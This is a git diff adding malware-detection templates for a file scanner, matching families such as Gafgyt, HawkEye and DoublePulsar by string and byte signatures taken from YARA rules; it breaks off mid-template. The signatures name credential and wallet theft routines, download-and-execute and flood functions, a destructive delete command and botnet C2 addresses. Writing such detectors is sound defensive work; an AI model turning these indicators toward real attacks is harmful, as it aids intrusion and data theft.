a/file/malware/cryptxxx-malware.yaml b/file/malware/cryptxxx-malware.yaml new file mode 100644 index 0000000000..abdbfc7bfd --- /dev/null +++ b/file/malware/cryptxxx-malware.yaml @@ -0,0 +1,42 @@ +id: cryptxxx-malware + +info: + name: CryptXXX Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_.CRYPTXXX.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "525947404A41595D52000000FFFFFFFF" + - "0600000052594740405A0000FFFFFFFF" + - "0A000000525C4B4D574D424B5C520000" + - "FFFFFFFF0A000000525D575D5A4B4370" + - "3F520000FFFFFFFF06000000524C4141" + - "5A520000FFFFFFFF0A000000525C4B4D" + - "41584B5C57520000FFFFFFFF0E000000" + - "522A5C4B4D574D424B204C4740520000" + - "FFFFFFFF0A000000525E4B5C48424149" + - "5D520000FFFFFFFF05000000524B4847" + - "52000000FFFFFFFF0C000000524D4140" + - "48474920435D475200000000FFFFFFFF" + - "0A000000525E5C41495C4F703F520000" + - "FFFFFFFF0A000000525E5C41495C4F70" + - "3C520000FFFFFFFF0800000052494141" + - "49424B5200000000FFFFFFFF06000000" + - "525A4B435E520000FFFFFFFF08000000" + - "52483A4C4D703F5200000000FFFFFFFF" + - "0A000000524F42425B5D4B703F520000" + - "FFFFFFFF0A000000525E5C41495C4F70" + - "3F520000FFFFFFFF0A000000525E5C41" + - "495C4F703C520000FFFFFFFF09000000" + - "524F5E5E4A4F5A4F52000000FFFFFFFF" + - "0A000000525E5C41495C4F703D520000" + - "FFFFFFFF08000000525E5B4C42474D52" + condition: and + +# digest: 490a0046304402200be06227894be466ece6600d08b5c21ffe0a1c04d8297f5fd684fc66fa64f0d202203f57a1271be83715b3953f3fcc4fd08dd1d2db57240cfd5fc9a9611008574bf9:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/cxpid-malware.yaml b/file/malware/cxpid-malware.yaml new file mode 100644 index 0000000000..8ebcd0e80c --- /dev/null +++ b/file/malware/cxpid-malware.yaml @@ -0,0 +1,28 @@ +id: cxpid-malware + +info: + name: Cxpid Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cxpid.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - '/cxpid/submit.php?SessionID=' + - '/cxgid/' + - 'E21BC52BEA2FEF26D005CF' + - 'E21BC52BEA39E435C40CD8' + - ' -,L-,O+,Q-,R-,Y-,S-' + + - type: binary + binary: + - "558BECB9380400006A006A004975F9" + +# digest: 4b0a00483046022100a74a127323c94ac22930026e66dd642dd77e020a5196c7595f654c18025ff3c3022100d1b6de3cb0908fd76b6556d63cd1a4b9208813f689c9e870cb1a83c55ba41970:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/cythosia-malware.yaml b/file/malware/cythosia-malware.yaml new file mode 100644 index 0000000000..815f72e01a --- /dev/null +++ b/file/malware/cythosia-malware.yaml @@ -0,0 +1,18 @@ +id: cythosia-malware + +info: + name: Cythosia Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Cythosia.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'HarvesterSocksBot.Properties.Resources' + +# digest: 490a00463044022078ad40bfbd1ef70b1a2d5f012e6f7e22f0c147b4622d3fb20bd95dca173ba3cd02207c1fd648ffed2e553b8f2d4fab5e3610c84cd330b9ec5bfcfdd6798fffcfbc68:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/darkrat-malware.yaml b/file/malware/darkrat-malware.yaml new file mode 100644 index 0000000000..1d1c5f0508 --- /dev/null +++ b/file/malware/darkrat-malware.yaml @@ -0,0 +1,25 @@ +id: darkrat-malware + +info: + name: DarkRAT Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "@1906dark1996coder@" + - "SHEmptyRecycleBinA" + - "mciSendStringA" + - "add_Shutdown" + - "get_SaveMySettingsOnExit" + - "get_SpecialDirectories" + - "Client.My" + condition: and + +# digest: 4b0a00483046022100b1285934cddc122f08b2b6076c401a94b5fada0579234b74bc87843121e15968022100b9ac1f7a35c4b00c9cdf22c8eb46cc6b2612b90f2cf9ff89e93589db08e7139c:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/ddostf-malware.yaml b/file/malware/ddostf-malware.yaml new file mode 100644 index 0000000000..17a04e6ce1 --- /dev/null +++ b/file/malware/ddostf-malware.yaml @@ -0,0 +1,31 @@ +id: ddostf-malware + +info: + name: DDoSTf Malware - Detect + author: daffainfo + severity: info + reference: + - http://blog.malwaremustdie.org/2016/01/mmd-0048-2016-ddostf-new-elf-windows.html + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DDoSTf.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - 'ddos.tf' + - 'Accept-Language: zh' + - '%d Kb/bps|%d%%' + condition: and + + - type: binary + binary: + - 'E8AEBEE7BDAE5443505F4B454550494E54564CE99499E8AFAFEFBC9A00' + - 'E8AEBEE7BDAE5443505F4B454550434E54E99499E8AFAFEFBC9A00' + condition: and + +# digest: 490a00463044022069c37b9b0b031a463f234c65dabef2ccf82eafbbf75453e3742a81fd59e4e222022050ab2c041ae193aa639c9d0bce242bee402c7c1f3edce808308c9eca74636193:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/derkziel-malware.yaml b/file/malware/derkziel-malware.yaml new file mode 100644 index 0000000000..7b484bb443 --- /dev/null +++ b/file/malware/derkziel-malware.yaml @@ -0,0 +1,25 @@ +id: derkziel-malware + +info: + name: Derkziel Malware - Detect + author: daffainfo + severity: info + reference: + - https://bhf.su/threads/137898/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Derkziel.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - '{!}DRZ{!}' + - 'User-Agent: Uploador' + - 'SteamAppData.vdf' + - 'loginusers.vdf' + - 'config.vdf' + condition: and + +# digest: 4a0a0047304502200d170fa9be481ceece013efa9f03701a25bf9a54312e54f49af20ff8e0005e7d02210083a9bad344313d9eca866ea080d3d24f1fce9d2dc5d75e94b83f2a3d25b8931e:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/dexter-malware.yaml b/file/malware/dexter-malware.yaml new file mode 100644 index 0000000000..3216bb29f5 --- /dev/null +++ b/file/malware/dexter-malware.yaml @@ -0,0 +1,24 @@ +id: dexter-malware + +info: + name: Dexter Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Dexter.yar + - http://goo.gl/oBvy8b + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'Java Security Plugin' + - '%s\\%s\\%s.exe' + - 'Sun Java Security Plugin' + - '\\Internet Explorer\\iexplore.exe' + condition: and + +# digest: 4b0a00483046022100a9287ff95aaf311e7c3268c65e993cb4467bfbb081b6232136aa8d2dc9deea78022100b630b834786bcd6d95a436f09629e6cb330112f7306659b2a36cba93f3203811:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/diamondfox-malware.yaml b/file/malware/diamondfox-malware.yaml new file mode 100644 index 0000000000..828d0d4eb1 --- /dev/null +++ b/file/malware/diamondfox-malware.yaml @@ -0,0 +1,24 @@ +id: diamondfox-malware + +info: + name: DiamondFox Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_DiamondFox.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'UPDATE_B' + - 'UNISTALL_B' + - 'S_PROTECT' + - 'P_WALLET' + - 'GR_COMMAND' + - 'FTPUPLOAD' + condition: and + +# digest: 490a0046304402207f1d1ad5c528eb43a5ae2b867941575a1a1cd0461e18acc4b4ac3b88aa9da21f0220311924a7023fe7f690e204eeeec7e950603025abe55859c4af9c0281ab0f79a1:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/dmalocker-malware.yaml b/file/malware/dmalocker-malware.yaml new file mode 100644 index 0000000000..33c0a1ed68 --- /dev/null +++ b/file/malware/dmalocker-malware.yaml @@ -0,0 +1,22 @@ +id: dmalocker-malware + +info: + name: DMA Locker Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DMALocker.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "41424358595a3131" + - "21444d414c4f434b" + - "21444d414c4f434b332e30" + - "3F520000FFFFFFFF06000000524C4141" + - "21444d414c4f434b342e30" + condition: or + +# digest: 490a00463044022019324b8f2ca02cf489e2b4b3b73d8fac28ea13d959460ce3da76a6dc9ea737b802205bb006cd82e5d13d91ac173c0e207961f79364f6205dddb16765ce48f0e43258:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/doublepulsar-malware.yaml b/file/malware/doublepulsar-malware.yaml new file mode 100644 index 0000000000..a4e8b8649a --- /dev/null +++ b/file/malware/doublepulsar-malware.yaml @@ -0,0 +1,19 @@ +id: doublepulsar-malware + +info: + name: DoublePulsar Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_DoublePulsar_Petya.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "FD0C8C5CB8C424C5CCCCCC0EE8CC246BCCCCCC0F24CDCCCCCC275C9775BACDCCCCC3FE" + - "45208D938D928D918D90929391970F9F9E9D99844529844D20CCCDCCCC9B844503844514844549CC3333332477CCCCCC844549C43333332484CDCCCC844549DC333333844749CC333333844741" + condition: or + +# digest: 4b0a00483046022100fecba2c76000ce4dc747b32d5a6c2db3b0fc1153f64c279ad5f81dc6f68ad056022100fc9cbbcfa1a0cec80ecef08d1a0d0b541d4154be1961c02789d91642a57604e4:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/eicar-malware.yaml b/file/malware/eicar-malware.yaml new file mode 100644 index 0000000000..59108a5bdb --- /dev/null +++ b/file/malware/eicar-malware.yaml @@ -0,0 +1,18 @@ +id: eicar-malware + +info: + name: Eicar Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Eicar.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" + +# digest: 4a0a0047304502207975a5baa7107c29fa43d0d09d14a1f330d75cc2c90e7e2959de621616bd920c022100aab3bdba5f0777409100b22da60d51f2bca3a630df47a3e1335c29d9eebacb7b:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/erebus-malware.yaml b/file/malware/erebus-malware.yaml new file mode 100644 index 0000000000..ed49ad1449 --- /dev/null +++ b/file/malware/erebus-malware.yaml @@ -0,0 +1,20 @@ +id: erebus-malware + +info: + name: Erebus Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Erebus.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "/{5f58d6f0-bb9c-46e2-a4da-8ebc746f24a5}//log.log" + - "EREBUS IS BEST." + condition: and + +# digest: 4a0a00473045022100b2c9308c6baa68c3f36be6375b9d4a08cbee7b2b76334063f64375c58a584c1a022014e00fe5cedabd573b20e277bfef437e04d245b551f692e451eea6a13297d093:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/ezcob-malware.yaml b/file/malware/ezcob-malware.yaml new file mode 100644 index 0000000000..336af009b6 --- /dev/null +++ b/file/malware/ezcob-malware.yaml @@ -0,0 +1,23 @@ +id: ezcob-malware + +info: + name: Ezcob Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Ezcob.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - '\x12F\x12F\x129\x12E\x12A\x12E\x12B\x12A\x12-\x127\x127\x128\x123\x12' + - '\x121\x12D\x128\x123\x12B\x122\x12E\x128\x12-\x12B\x122\x123\x12D\x12' + - 'Ezcob' + - 'l\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x126' + - '20110113144935' + condition: or + +# digest: 4b0a00483046022100d6413aad4692251618745a1305877e38ef6a0265199e5593006c6941238b5727022100f9b2270f44ab1e5a8aab94ad046274a148e26d8b9357279e8a3bf2d38218ebc6:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/fudcrypt-malware.yaml b/file/malware/fudcrypt-malware.yaml new file mode 100644 index 0000000000..aca8665247 --- /dev/null +++ b/file/malware/fudcrypt-malware.yaml @@ -0,0 +1,31 @@ +id: fudcrypt-malware + +info: + name: FUDCrypt Malware - Detect + author: daffainfo + severity: info + reference: + - https://github.com/gigajew/FudCrypt/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_FUDCrypt.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'OcYjzPUtJkNbLOABqYvNbvhZf' + - 'gwiXxyIDDtoYzgMSRGMckRbJi' + - 'BclWgISTcaGjnwrzSCIuKruKm' + - 'CJyUSiUNrIVbgksjxpAMUkAJJ' + - 'fAMVdoPUEyHEWdxQIEJPRYbEN' + - 'CIGQUctdcUPqUjoucmcoffECY' + - 'wcZfHOgetgAExzSoWFJFQdAyO' + - 'DqYKDnIoLeZDWYlQWoxZnpfPR' + - 'MkhMoOHCbGUMqtnRDJKnBYnOj' + - 'sHEqLMGglkBAOIUfcSAgMvZfs' + - 'JtZApJhbFAIFxzHLjjyEQvtgd' + - 'IIQrSWZEMmoQIKGuxxwoTwXka' + +# digest: 4a0a004730450220551ad1f48b67447105de1dfeb2283e4894300d7a04b4f462ded8efb032531660022100fd607a6ae4731a63a068a4047c8d8f3b51f4f398e8c00da9c90123662ac275c6:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/gafgyt-bash-malware.yaml b/file/malware/gafgyt-bash-malware.yaml new file mode 100644 index 0000000000..1a992d71e9 --- /dev/null +++ b/file/malware/gafgyt-bash-malware.yaml @@ -0,0 +1,22 @@ +id: gafgyt-bash-malware + +info: + name: Gafgyt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'PONG!' + - 'GETLOCALIP' + - 'HTTPFLOOD' + - 'LUCKYLILDUDE' + condition: and + +# digest: 490a004630440220288713ec4bd6977eff7ff75df4f036ef52f817f9dfe2e40dd236505b71a6b3fe02202a06c8127b4cf5382386c17d9314bc3cbd4ebc39f573cfd5c4048b416bef314c:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/gafgyt-generic-malware.yaml b/file/malware/gafgyt-generic-malware.yaml new file mode 100644 index 0000000000..f8f4aa75e2 --- /dev/null +++ b/file/malware/gafgyt-generic-malware.yaml @@ -0,0 +1,22 @@ +id: gafgyt-generic-malware + +info: + name: Gafgyt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "/bin/busybox;echo -e 'gayfgt'" + - '/proc/net/route' + - 'admin' + - 'root' + condition: and + +# digest: 4a0a00473045022100a436723552485c6e8cc638338d9303400a69c5e8dc1e1e9e57a1376af7cb4cee02203fce2be6541cb69686c31e611bb3800f4e3eb94eda45d82679d7e336e96a78ec:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/gafgyt-hihi-malware.yaml b/file/malware/gafgyt-hihi-malware.yaml new file mode 100644 index 0000000000..65487a5294 --- /dev/null +++ b/file/malware/gafgyt-hihi-malware.yaml @@ -0,0 +1,24 @@ +id: gafgyt-hihi-malware + +info: + name: Gafgyt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'PING' + - 'PONG' + - 'TELNET LOGIN CRACKED - %s:%s:%s' + - 'ADVANCEDBOT' + - '46.166.185.92' + - 'LOLNOGTFO' + condition: and + +# digest: 4a0a0047304502202b4ae96e807e07b5a92453399994ce2d360a5262c5f42de79da60ca5e61ffdf9022100e101b40699838926c53e2672358afec4eb70034f8057f3139d9471d06218d0ec:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/gafgyt-hoho-malware.yaml b/file/malware/gafgyt-hoho-malware.yaml new file mode 100644 index 0000000000..9764975f7b --- /dev/null +++ b/file/malware/gafgyt-hoho-malware.yaml @@ -0,0 +1,22 @@ +id: gafgyt-hoho-malware + +info: + name: Gafgyt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'PING' + - 'PRIVMSG' + - 'Remote IRC Bot' + - '23.95.43.182' + condition: and + +# digest: 490a0046304402204caa36b7085382217c68b836ba02e409b7a9d1cc06a53445152789adaa6c8d5e02204838d1ce8e133534ecaeb957858422d28886ab366b5d0cdfa3aabfb343e3f83a:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/gafgyt-jackmy-malware.yaml b/file/malware/gafgyt-jackmy-malware.yaml new file mode 100644 index 0000000000..692359544c --- /dev/null +++ b/file/malware/gafgyt-jackmy-malware.yaml @@ -0,0 +1,22 @@ +id: gafgyt-jackmy-malware + +info: + name: Gafgyt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'PING' + - 'PONG' + - 'jackmy' + - '203.134.%d.%d' + condition: and + +# digest: 4b0a004830460221009f75b155ff1a6cf0f9a2e515fbefc0ee6844cabc036c2f3d06c74a219756f795022100fba0315b774cdd5dd17543a17c7a5b57ed9926583ffb40b32e940bd6b1407968:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/gafgyt-oh-malware.yaml b/file/malware/gafgyt-oh-malware.yaml new file mode 100644 index 0000000000..96d938deff --- /dev/null +++ b/file/malware/gafgyt-oh-malware.yaml @@ -0,0 +1,22 @@ +id: gafgyt-oh-malware + +info: + name: Gafgyt Oh Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gafgyt.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'busyboxterrorist' + - 'BOGOMIPS' + - '124.105.97.%d' + - 'fucknet' + condition: and + +# digest: 4a0a0047304502203cc1627cee509aef93e68476939f3d1e2fc7371357a73b47ed730dc272ed7d56022100f4d1eeddad80745d41b9eb5c1c9cb7b661d8d764628eaa2b21bba7a5abf0bcda:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/genome-malware.yaml b/file/malware/genome-malware.yaml new file mode 100644 index 0000000000..f585b0e46f --- /dev/null +++ b/file/malware/genome-malware.yaml @@ -0,0 +1,21 @@ +id: genome-malware + +info: + name: Genome Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Genome.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - 'Attempting to create more than one keyboard::Monitor instance' + - '{Right windows}' + - 'Access violation - no RTTI data!' + condition: and + +# digest: 4b0a004830460221008e67d4a702001206e2838ed87a09a2d6dc3a0a423643a3b19fab912895944d3c022100d8d561eda4eb5f713345d6e04db0b1f2e27daa13009c62a27c9ee08888f91b23:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/glass-malware.yaml b/file/malware/glass-malware.yaml new file mode 100644 index 0000000000..b5de811231 --- /dev/null +++ b/file/malware/glass-malware.yaml @@ -0,0 +1,22 @@ +id: glass-malware + +info: + name: Glass Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Glass.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "PostQuitMessage" + - "pwlfnn10,gzg" + - "update.dll" + - "_winver" + condition: and + +# digest: 4b0a00483046022100fcc6a253c1cdfca1770ded4ccd721e5afc7ed561be162c18d0f614b63ae0efcf022100e1a58b609f151bbaa49837795a9f58a042d7c54b320bd63841a558743c131d6f:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/glasses-malware.yaml b/file/malware/glasses-malware.yaml new file mode 100644 index 0000000000..49295186a3 --- /dev/null +++ b/file/malware/glasses-malware.yaml @@ -0,0 +1,31 @@ +id: glasses-malware + +info: + name: Glasses Malware - Detect + author: daffainfo + severity: info + reference: + - https://citizenlab.ca/2013/02/apt1s-glasses-watching-a-human-rights-organization/ + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Glasses.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - 'thequickbrownfxjmpsvalzydg' + - 'Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)' + - '" target="NewRef">' + condition: and + + - type: binary + binary: + - "B8ABAAAAAAF7E1D1EA8D04522BC8" + - "B856555555F7E98B4C241C8BC2C1E81F03D0493BCA" + condition: or + +# digest: 490a0046304402206c19fd7664b98e1beacc91b5cefd899284e3b9db9a5496b2d1b8c11ad06ee77e02204d59c759c20e30834d429d754f136bc7b70d841a6c2e128611028841235f1a8f:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/gozi-malware.yaml b/file/malware/gozi-malware.yaml new file mode 100644 index 0000000000..404d68f89a --- /dev/null +++ b/file/malware/gozi-malware.yaml @@ -0,0 +1,19 @@ +id: gozi-malware + +info: + name: Gozi Malware - Detect + author: daffainfo + severity: info + reference: + - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Gozi.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "63006F006F006B006900650073002E00730071006C006900740065002D006A006F00750072006E0061006C0000004F504552412E45584500" + +# digest: 4a0a004730450220461dc17288917677ebacf3d4c6deda849d7ed8ff2fe3359d83699d44a161bee402210093eea6ed3ce4a7a060970f7c6ccf74ccf21072494021cf544172d346785bba79:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/gpgqwerty-malware.yaml b/file/malware/gpgqwerty-malware.yaml new file mode 100644 index 0000000000..b924233610 --- /dev/null +++ b/file/malware/gpgqwerty-malware.yaml @@ -0,0 +1,22 @@ +id: gpgqwerty-malware + +info: + name: GPGQwerty Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_GPGQwerty.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "gpg.exe –recipient qwerty -o" + - "%s%s.%d.qwerty" + - "del /Q /F /S %s$recycle.bin" + - "cryz1@protonmail.com" + condition: and + +# digest: 4a0a00473045022075d6b8b24de31fa7102eb77cb2017df3222bd2503952eccfc5b2df8b0050602c02210099773f7ad192a738d66c6158fe6c3ed780b2853160405731d3e392ca415001c9:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/greame-malware.yaml b/file/malware/greame-malware.yaml new file mode 100644 index 0000000000..e98cd61e1a --- /dev/null +++ b/file/malware/greame-malware.yaml @@ -0,0 +1,32 @@ +id: greame-malware + +info: + name: Greame Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: and + matchers: + - type: word + part: raw + words: + - "EditSvr" + - "TLoader" + - "Stroks" + - "Avenger by NhT" + - "####@####" + - "GREAME" + condition: and + + - type: binary + binary: + - "232323234023232323E8EEE9F9232323234023232323" + - "232323234023232323FAFDF0EFF9232323234023232323" + condition: and + +# digest: 490a004630440220033cb352a6c026a34645d20c297b5c3ea9243c1d98830fc03c61e0b633f085e102201e7ec4e2892ccaf6dcacfae3b5395acb8dd0da6311a4caa0373e67014d681af1:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/grozlex-malware.yaml b/file/malware/grozlex-malware.yaml new file mode 100644 index 0000000000..9f3ec78e33 --- /dev/null +++ b/file/malware/grozlex-malware.yaml @@ -0,0 +1,19 @@ +id: grozlex-malware + +info: + name: Grozlex Malware - Detect + author: daffainfo + severity: info + reference: + - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html + - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Grozlex.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: binary + binary: + - "4C006F00670073002000610074007400610063006800650064002000620079002000690043006F007A0065006E" + +# digest: 4b0a00483046022100b2982d797690c09fbb5a52a4acd50c97065486d840366ebe849db40f091a051a022100b320ef03f51e8f1a2dab81c0591e69900e265252316c08f0711442b99f12650b:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/hawkeye-malware.yaml b/file/malware/hawkeye-malware.yaml new file mode 100644 index 0000000000..3cd32b75ff --- /dev/null +++ b/file/malware/hawkeye-malware.yaml @@ -0,0 +1,27 @@ +id: hawkeye-malware + +info: + name: HawkEye Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "HawkEyeKeylogger" + - "099u787978786" + - "HawkEye_Keylogger" + - "holdermail.txt" + - "wallet.dat" + - "Keylog Records" + - "" + - "\\pidloc.txt" + - "BSPLIT" + condition: and + +# digest: 4a0a004730450221009d0d74bbb3d7f02cd3e3f6f0b539b399ccf1b22147a164d8bcddd5fabdc5c54c02202f69f83003e25a2a80e7755f4048d6f34278c80ce5aacb40d25c177948161cd6:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/hydracrypt-malware.yaml b/file/malware/hydracrypt-malware.yaml new file mode 100644 index 0000000000..88bc8fe305 --- /dev/null +++ b/file/malware/hydracrypt-malware.yaml @@ -0,0 +1,23 @@ +id: ransomware_windows_hydracrypt + +info: + name: Hydracrypt Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara + tags: malware,file,hydracrypt +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "oTraining" + - "Stop Training" + - "Play \"sound.wav\"" + - "&Start Recording" + - "7About record" + condition: and + +# digest: 4a0a004730450220408bdc9a1276d1da11b112f8fbd617c84176a4a4c239a3669f2cd26ed6d9a1aa022100c8c051a81f80c4eca9ee7ef902bb5336a9d79bcccb991e35aa4dfd533e5dbb03:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/imminent-malware.yaml b/file/malware/imminent-malware.yaml new file mode 100644 index 0000000000..eacb4ee84d --- /dev/null +++ b/file/malware/imminent-malware.yaml @@ -0,0 +1,38 @@ +id: imminent-malware + +info: + name: Imminent Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - "DecodeProductKey" + - "StartHTTPFlood" + - "CodeKey" + - "MESSAGEBOX" + - "GetFilezillaPasswords" + - "DataIn" + - "UDPzSockets" + condition: and + + - type: word + part: raw + words: + - "k__BackingField" + - "k__BackingField" + - "DownloadAndExecute" + - "england.png" + - "-CHECK & PING -n 2 127.0.0.1 & EXIT" + - "Showed Messagebox" + condition: and + +# digest: 4a0a0047304502206e2f6dc27e1c37ff961d32317adaa25228ebc6996fe5bc91b0e2cdff3c5bee57022100b72c085e7b2c4bef399e91106089e1f999df023718d984781d37a80974c42b41:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/infinity-malware.yaml b/file/malware/infinity-malware.yaml new file mode 100644 index 0000000000..2889a977ba --- /dev/null +++ b/file/malware/infinity-malware.yaml @@ -0,0 +1,26 @@ +id: infinity-malware + +info: + name: Infinity Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar + tags: malware,file +file: + - extensions: + - all + matchers: + - type: word + part: raw + words: + - "CRYPTPROTECT_PROMPTSTRUCT" + - "discomouse" + - "GetDeepInfo" + - "AES_Encrypt" + - "StartUDPFlood" + - "BATScripting" + - "FBqINhRdpgnqATxJ.html" + - "magic_key" + condition: and + +# digest: 490a0046304402206e7b4d78d5bef2155ee5f2c63a83a5b744fa98a1a5d8da69cabd566de79dc17b022017ce798b08acdf07a11c2949bcf220b510955c404d383bfa3b32b998ac20663e:922c64590222798bb761d5b6d8e72950 diff --git a/file/malware/insta11-malware.yaml b/file/malware/insta11-malware.yaml new file mode 100644 index 0000000000..878e851cb6 --- /dev/null +++ b/file/malware/insta11-malware.yaml @@ -0,0 +1,29 @@ +id: insta11-malware + +info: + name: Insta11 Malware - Detect + author: daffainfo + severity: info + reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Install11.yar + tags: malware,file +file: + - extensions: + - all + + matchers-condition: or + matchers: + - type: word + part: raw + words: + - 'XTALKER7' + - 'Insta11 Microsoft' + - 'wudMessage' + - 'ECD4FC4D-521C-11D0-B792-00A0C90312E1' + - 